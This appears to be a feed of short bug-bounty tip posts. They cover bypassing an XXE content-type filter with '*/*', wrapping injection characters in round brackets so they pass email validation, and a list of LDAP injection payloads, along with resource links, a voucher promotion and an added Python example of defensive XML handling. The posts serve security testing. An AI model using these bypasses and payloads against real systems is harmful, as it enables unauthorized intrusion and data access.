A simple bypass for XXE
To avoid XXE injections, some web applications use custom filters that block requests with an "application/xml" Content-Type. To bypass these filters, we can set the Content-Type to the wildcard "*/*".
#bugbounty #Infosec #securitytips
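Added example (not part of the original post): the deny-list filter the tip describes, next to two defensive checks that do not depend on the client's Content-Type. The allow-listed type `application/json`, the function names and the sample bodies are assumptions constructed for illustration.

```python
import xml.parsers.expat

# Constructed sample bodies: one declares a (harmless, internal) entity via a DOCTYPE.
SAMPLE_XML = b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY e "x">]><r>&e;</r>'
PLAIN_XML = b'<?xml version="1.0"?><r>hello</r>'

def media_type(header):
    """Lower-cased type/subtype with parameters (e.g. charset) removed."""
    return header.split(";", 1)[0].strip().lower()

def denylist_filter(content_type):
    """Weak filter as described in the post: rejects only application/xml."""
    return media_type(content_type) != "application/xml"

ALLOWED_TYPES = {"application/json"}  # assumption: the endpoint expects JSON only

def allowlist_filter(content_type):
    """Accept only the exact media types the endpoint is meant to handle."""
    return media_type(content_type) in ALLOWED_TYPES

class DoctypeForbidden(ValueError):
    pass

def parse_without_dtd(body):
    """Parse XML but refuse any DOCTYPE, so no entity can be declared at all."""
    def forbid(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden("DOCTYPE not allowed")
    text = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return "".join(text)

def is_rejected(body):
    """True when the hardened parser refuses the document."""
    try:
        parse_without_dtd(body)
        return False
    except DoctypeForbidden:
        return True

if __name__ == "__main__":
    for ct in ("application/xml", "*/*", "text/xml", "application/json"):
        print(f"{ct!r}: denylist passes={denylist_filter(ct)}, allowlist passes={allowlist_filter(ct)}")
    print("DOCTYPE body rejected:", is_rejected(SAMPLE_XML))
```

The deny-list lets `*/*` and `text/xml` through, so the control that holds is the parser configuration: a document with a DOCTYPE is refused no matter which header arrived with it.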
Should I add a discussion box below posts that are discussable?
Anonymous Poll
96%
Yes, I want to discuss
4%
No, I don't need to discuss anything
Bug List (Most Commonly Found) 🔥🌵
More Clarity : https://pbs.twimg.com/media/FhVuIKHVsAEKnpD?format=png&name=medium
#bugbounty #Infosec
Bugbounty Tips
Use round brackets to inject XSS / SQLi / RCE payloads in a valid e-mail address.
❌ yourname${}<>'/"*-@domain.com
✅ yourname(${}<>'/"*-)@domain.com
✅ yourname@(${}<>'/"*-)domain.com
#bugbounty #infosec #cybersecurity
Those who want to purchase a TryHackMe voucher,
please go fast,
because I personally requested a discount from the seller for you guys.
This offer is valid for today (according to IST).
LDAP injection payloads 🔥🔥🔥🔥
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*)
*(|(objectclass=*))
*)(uid=*))(|(uid=*
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbounty #infosec
_All about bug bounty_ GitHub resource ❤️
These are my bug bounty notes that I have gathered from various sources. You can contribute to this repository too!
Link : https://github.com/daffainfo/AllAboutBugBounty
#bugbounty #bugbountytips #infosec
💥Subdomain Enum Automation Script💥
Download Image : https://raw.githubusercontent.com/tarunKoyalwar/talosplus/main/static/script.png
#bugbounty #infosec #bugbountytips